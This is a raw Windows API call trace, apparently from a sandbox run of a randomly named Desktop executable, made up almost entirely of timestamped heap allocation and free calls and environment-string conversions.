lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0126.114] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xcf) returned 0x524400 [0126.114] GetEnvironmentStringsW () returned 0x5387a0* [0126.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4e6) returned 0x539180 [0126.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x539180, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0126.115] FreeEnvironmentStringsW (penv=0x5387a0) returned 1 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x118) returned 0x529b90 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1f) returned 0x52af80 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x52e0c0 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x31) returned 0x52e100 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x5313f0 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x31) returned 0x52e180 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x14) returned 0x523fb0 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x52b220 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xd) returned 0x5294a0 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1d) returned 0x52b160 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x31) returned 0x52e580 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x15) returned 0x524090 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x17) returned 0x5225f0 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xe) returned 0x52c310 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x69) returned 0x5220d0 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3e) returned 0x5312b0 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1d) returned 0x52afe0 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x48) returned 0x530e50 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x12) returned 0x52c330 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x18) returned 0x522150 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1b) returned 0x52b520 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1e) returned 0x52b040 [0126.115] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x29) returned 0x52e2c0 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1e) returned 0x52b070 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x6b) returned 0x524b40 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x17) returned 0x522170 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xf) returned 0x524810 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x16) returned 0x524830 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2a) returned 0x52e340 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x29) returned 0x52e380 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x12) returned 0x524580 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x21) returned 0x52b250 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x16) returned 0x539800 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x22) returned 0x52b1f0 [0126.116] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x12) returned 0x539960 [0126.116] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539180 | out: hHeap=0x520000) returned 1 [0126.117] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa3a7) returned 0x539a80 [0126.119] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x52b550 [0126.119] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa3a7) returned 0x543e30 [0126.120] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.120] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfef7) returned 0x54e1e0 [0126.123] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x530a90 [0126.124] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfef7) returned 0x55e0e0 [0126.125] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b550 | out: hHeap=0x520000) returned 1 [0126.125] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x54e1e0 | out: hHeap=0x520000) returned 1 [0126.395] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x450) returned 0x5387a0 [0126.395] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x450) returned 0x538c00 [0126.396] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.396] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1ea7) returned 0x56dfe0 [0126.396] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xf40) returned 0x539a80 [0126.397] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x7a0) returned 0x53a9d0 [0126.397] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.397] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.397] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xbf0) returned 0x539a80 [0126.397] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x538c00 | out: hHeap=0x520000) returned 1 [0126.397] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53a9d0 | out: hHeap=0x520000) returned 1 [0126.397] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x640) returned 0x5387a0 [0126.397] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1247) returned 0x56dfe0 [0126.398] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.398] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.398] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x520) returned 0x56f230 [0126.398] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1b56) returned 0x539a80 [0126.398] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.398] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56f230 | out: hHeap=0x520000) returned 1 [0126.398] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8a0) returned 0x5387a0 [0126.398] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x28ed) returned 0x53b5e0 [0126.398] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.398] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.399] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x550) returned 0x5387a0 [0126.399] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.399] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2537) returned 0x53dee0 [0126.399] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x12b7) returned 0x539a80 [0126.399] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x950) returned 0x5387a0 [0126.400] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53dee0 | out: hHeap=0x520000) returned 1 [0126.400] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.400] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x3d4f) returned 0x53dee0 [0126.400] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53b5e0 | out: hHeap=0x520000) returned 1 [0126.400] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.400] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2377) returned 0x539a80 [0126.400] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11d7) returned 0x56dfe0 [0126.401] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8e0) returned 0x56f1c0 [0126.401] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.401] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.401] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56f1c0 | out: hHeap=0x520000) returned 1 [0126.401] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5b0) returned 0x5387a0 [0126.401] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.401] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x640) returned 0x5387a0 [0126.401] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5be2) returned 0x54e1e0 [0126.402] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53dee0 | out: hHeap=0x520000) returned 1 [0126.402] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.403] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x890) returned 0x5387a0 [0126.403] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.403] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xac0) returned 0x5387a0 [0126.403] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.403] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x52b0a0 [0126.403] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x960) returned 0x5387a0 [0126.403] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x960) returned 0x56dfe0 [0126.403] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.403] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x460) returned 0x5387a0 [0126.403] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe0f) returned 0x56e950 [0126.403] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.403] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.403] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1c17) returned 0x553dd0 [0126.404] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe00) returned 0x5387a0 [0126.404] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x700) returned 0x56f770 [0126.404] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553dd0 | out: hHeap=0x520000) returned 1 [0126.404] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.404] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x153d) returned 0x553dd0 [0126.404] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56e950 | out: hHeap=0x520000) returned 1 [0126.404] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56f770 | out: hHeap=0x520000) returned 1 [0126.404] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2277) returned 0x555320 [0126.405] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1157) returned 0x56dfe0 [0126.405] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8a0) returned 0x56f140 [0126.405] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x555320 | out: hHeap=0x520000) returned 1 [0126.405] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.405] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1fc7) returned 0x555320 [0126.405] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553dd0 | out: hHeap=0x520000) returned 1 [0126.406] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56f140 | out: hHeap=0x520000) returned 1 [0126.406] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1657) returned 0x56dfe0 [0126.406] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xb20) returned 0x5387a0 [0126.406] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x590) returned 0x56f640 [0126.406] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.406] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.406] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2f96) returned 0x5572f0 [0126.407] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x555320 | out: hHeap=0x520000) returned 1 [0126.407] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56f640 | out: hHeap=0x520000) returned 1 [0126.407] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2b47) returned 0x553dd0 [0126.407] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x15b7) returned 0x56dfe0 [0126.408] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xad0) returned 0x5387a0 [0126.408] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553dd0 | out: hHeap=0x520000) returned 1 [0126.408] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.408] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.408] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2697) returned 0x553dd0 [0126.408] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1367) returned 0x56dfe0 [0126.409] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x9a0) returned 0x56f350 [0126.409] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553dd0 | out: hHeap=0x520000) returned 1 [0126.409] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.409] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x474d) returned 0x539a80 [0126.409] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5572f0 | out: hHeap=0x520000) returned 1 [0126.409] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56f350 | out: hHeap=0x520000) returned 1 [0126.409] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x920) returned 0x5387a0 [0126.409] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.409] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1b47) returned 0x56dfe0 [0126.409] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xd90) returned 0x5387a0 [0126.410] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6d0) returned 0x53e1e0 [0126.410] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.410] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.410] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53e1e0 | out: hHeap=0x520000) returned 1 [0126.410] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5d0) returned 0x5387a0 [0126.410] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6adf) returned 0x553dd0 [0126.410] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.410] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.410] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1887) returned 0x56dfe0 [0126.410] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc30) returned 0x5387a0 [0126.410] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x620) returned 0x56f870 [0126.410] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.410] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.410] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56f870 | out: hHeap=0x520000) returned 1 [0126.410] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8f0) returned 0x5387a0 [0126.410] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x480) returned 0x5390a0 [0126.411] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x240) returned 0x56dfe0 [0126.411] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.411] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5390a0 | out: hHeap=0x520000) returned 1 [0126.411] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.411] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x531530 [0126.411] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b0a0 | out: hHeap=0x520000) returned 1 [0126.411] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x54e1e0 | out: hHeap=0x520000) returned 1 [0126.411] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553dd0 | out: hHeap=0x520000) returned 1 [0126.412] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x531530 | out: hHeap=0x520000) returned 1 [0126.412] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x9900) returned 0x539a80 [0126.413] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1bf0) returned 0x56dfe0 [0126.415] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.415] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x9937) returned 0x54e1e0 [0126.416] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.416] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x52b550 [0126.416] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x9900) returned 0x539a80 [0126.416] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1bf0) returned 0x56dfe0 [0126.417] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0126.417] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x9937) returned 0x56dfe0 [0126.417] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539a80 | out: hHeap=0x520000) returned 1 [0126.418] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x530bd0 [0126.418] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b550 | out: hHeap=0x520000) returned 1 [0126.418] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x543e30 | out: hHeap=0x520000) returned 1 [0126.419] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55e0e0 | out: hHeap=0x520000) returned 1 [0126.419] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x530a90 | out: hHeap=0x520000) returned 1 [0126.419] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x539a80 [0126.419] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x557b20 [0126.419] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5245a0 [0126.419] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x577920 [0126.420] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539720 [0126.420] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5245a0 | out: hHeap=0x520000) returned 1 [0126.420] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x58ab30 [0126.420] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x539860 [0126.420] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539720 | out: hHeap=0x520000) returned 1 [0126.421] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x59dd40 [0126.421] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x52b550 [0126.421] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539860 | out: hHeap=0x520000) returned 1 [0126.421] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x5b0f50 [0126.421] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x30) returned 0x52e400 [0126.421] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b550 | out: hHeap=0x520000) returned 1 [0126.421] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x5c4160 [0126.422] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x5d7370 [0126.422] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x48) returned 0x5306d0 [0126.422] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e400 | out: hHeap=0x520000) returned 1 [0126.422] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x5ea580 [0126.423] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x5fd790 [0126.423] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1e40080 [0126.424] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x68) returned 0x523eb0 [0126.424] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5306d0 | out: hHeap=0x520000) returned 1 [0126.424] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1e53290 [0126.424] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1e664a0 [0126.425] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1e796b0 [0126.425] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1e8c8c0 [0126.426] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x98) returned 0x52b5c0 [0126.426] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x523eb0 | out: hHeap=0x520000) returned 1 [0126.426] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1e9fad0 [0126.427] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1eb2ce0 [0126.427] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1ec5ef0 [0126.427] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1ed9100 [0126.428] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1eec310 [0126.428] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1eff520 [0126.429] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe0) returned 0x5288a0 [0126.429] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b5c0 | out: hHeap=0x520000) returned 1 [0126.429] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x1f12730 [0126.429] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2010080 [0126.430] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2023290 [0126.632] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x20364a0 [0126.632] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x20496b0 [0126.632] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x205c8c0 [0126.633] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x206fad0 [0126.633] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2082ce0 [0126.634] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2095ef0 [0126.634] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x150) returned 0x52ac50 [0126.634] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5288a0 | out: hHeap=0x520000) returned 1 [0126.634] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x20a9100 [0126.634] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x20bc310 [0126.635] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x20cf520 [0126.635] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x20e2730 [0126.636] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x20f5940 [0126.636] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2108b50 [0126.636] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x211bd60 [0126.637] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x212ef70 [0126.637] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2142180 [0126.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2155390 [0126.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x21685a0 [0126.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x217b7b0 [0126.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x218e9c0 [0126.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 